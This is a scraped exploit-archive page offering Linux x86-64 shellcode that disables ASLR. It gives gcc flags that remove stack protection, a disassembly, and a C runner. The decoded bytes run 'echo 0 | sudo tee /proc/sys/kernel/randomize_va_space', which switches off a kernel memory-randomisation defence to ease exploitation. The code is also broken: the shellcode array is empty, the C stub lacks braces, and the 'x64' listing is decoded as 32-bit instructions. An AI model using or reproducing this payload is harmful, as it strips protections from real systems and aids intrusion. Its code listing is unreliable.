Linux/x64 disable aslr security shellcode (93 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-12-19 | Type : shellcode | Platform : linux_x86-64
This exploit / vulnerability Linux/x64 disable aslr security shellcode (93 bytes) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64

Author : Kağan Çapar
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []

run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"


global _start
section .ASLR

#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall


#include <stdio.h>
#include <string.h>

unsigned char ASLR[] = \

int main()
printf("Shellcode len: %d\n", strlen(ASLR));

int (*ret)() = (int(*)())ASLR;

